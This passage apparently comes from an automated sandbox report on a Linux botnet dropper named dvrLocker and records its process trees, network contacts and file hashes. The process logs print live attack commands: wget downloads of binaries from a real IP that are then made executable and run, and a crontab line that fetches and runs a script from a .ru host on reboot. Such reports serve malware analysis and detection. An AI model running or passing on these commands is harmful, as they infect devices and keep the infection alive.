| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 152.53.15.127 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.x2KALa | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/834/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/860/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/835/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/mounts | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/841/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/868/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/870/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/772/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/838/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/843/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/827/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/842/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/872/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/874/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/829/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/814/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/848/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/861/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/845/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/852/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/813/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/810/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/865/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/822/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/826/status | /tmp/lib/dvrLocker | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/106/exe]
/bin/ls
[ls -l /proc/108/exe]
/bin/ls
[ls -l /proc/109/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/137/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/141/exe]
/bin/ls
[ls -l /proc/146/exe]
/bin/ls
[ls -l /proc/147/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/167/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/200/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/219/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/25/exe]
/bin/ls
[ls -l /proc/26/exe]
/bin/ls
[ls -l /proc/268/exe]
/bin/ls
[ls -l /proc/269/exe]
/bin/ls
[ls -l /proc/27/exe]
/bin/ls
[ls -l /proc/271/exe]
/bin/ls
[ls -l /proc/273/exe]
/bin/ls
[ls -l /proc/274/exe]
/bin/ls
[ls -l /proc/28/exe]
/bin/ls
[ls -l /proc/29/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/305/exe]
/bin/ls
[ls -l /proc/308/exe]
/bin/ls
[ls -l /proc/309/exe]
/bin/ls
[ls -l /proc/321/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/41/exe]
/bin/ls
[ls -l /proc/42/exe]
/bin/ls
[ls -l /proc/43/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/573/exe]
/bin/ls
[ls -l /proc/586/exe]
/bin/ls
[ls -l /proc/591/exe]
/bin/ls
[ls -l /proc/593/exe]
/bin/ls
[ls -l /proc/594/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/625/exe]
/bin/ls
[ls -l /proc/632/exe]
/bin/ls
[ls -l /proc/633/exe]
/bin/ls
[ls -l /proc/635/exe]
/bin/ls
[ls -l /proc/637/exe]
/bin/ls
[ls -l /proc/638/exe]
/bin/ls
[ls -l /proc/639/exe]
/bin/ls
[ls -l /proc/640/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/ls
[ls -l /proc/98/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf arm]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf /mnt/dvrLocker]
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| US | 217.28.130.41:11973 | kingstonwikkerink.dyn | tcp |
| US | 168.235.111.72:53 | kingstonwikkerink.dyn | udp |
| GB | 91.149.238.18:8414 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/tmp/lib/dvrLocker
| MD5 | d09db60a70d5b53b5b53ad39476fd7e8 |
| SHA1 | 73a75e5e8200f77d857a7256cc0979077e29241d |
| SHA256 | 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165 |
| SHA512 | ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04 |
/var/spool/cron/crontabs/tmp.x2KALa
| MD5 | c8f52a3f659ca7c7be0a52692aa80acb |
| SHA1 | 1e01d51afb31de66a9a6896f490cbdc600d6fbb2 |
| SHA256 | 0c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10 |
| SHA512 | 9c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
debian9-mipsbe-20240418-en
Max time kernel
106s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 202.61.197.122 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.cK7Kfe | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox telentd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/894/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/857/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/874/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/876/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/895/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/907/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/938/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/852/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/889/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/914/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/711/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/858/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/948/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/865/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/882/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/919/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/937/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/881/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/886/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/905/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/920/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/909/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/916/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/915/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/926/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/851/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/899/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/896/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/913/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/923/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/942/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/859/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/872/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/877/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/903/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/111/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/121/exe]
/bin/ls
[ls -l /proc/122/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/148/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/157/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/173/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/207/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/234/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/319/exe]
/bin/ls
[ls -l /proc/320/exe]
/bin/ls
[ls -l /proc/323/exe]
/bin/ls
[ls -l /proc/325/exe]
/bin/ls
[ls -l /proc/326/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/37/exe]
/bin/ls
[ls -l /proc/378/exe]
/bin/ls
[ls -l /proc/379/exe]
/bin/ls
[ls -l /proc/383/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/427/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/665/exe]
/bin/ls
[ls -l /proc/668/exe]
/bin/ls
[ls -l /proc/671/exe]
/bin/ls
[ls -l /proc/672/exe]
/bin/ls
[ls -l /proc/688/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/70/exe]
/bin/ls
[ls -l /proc/701/exe]
/bin/ls
[ls -l /proc/702/exe]
/bin/ls
[ls -l /proc/705/exe]
/bin/ls
[ls -l /proc/708/exe]
/bin/ls
[ls -l /proc/709/exe]
/bin/ls
[ls -l /proc/71/exe]
/bin/ls
[ls -l /proc/711/exe]
/bin/ls
[ls -l /proc/712/exe]
/bin/ls
[ls -l /proc/713/exe]
/bin/ls
[ls -l /proc/72/exe]
/bin/ls
[ls -l /proc/73/exe]
/bin/ls
[ls -l /proc/74/exe]
/bin/ls
[ls -l /proc/75/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/77/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/80/exe]
/bin/ls
[ls -l /proc/82/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf mips]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 202.61.197.122:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:23655 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/var/spool/cron/crontabs/tmp.cK7Kfe
| MD5 | e728bc24eeb3365830019d50d1e8e05c |
| SHA1 | b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f |
| SHA256 | 68c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966 |
| SHA512 | 64ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 08:41
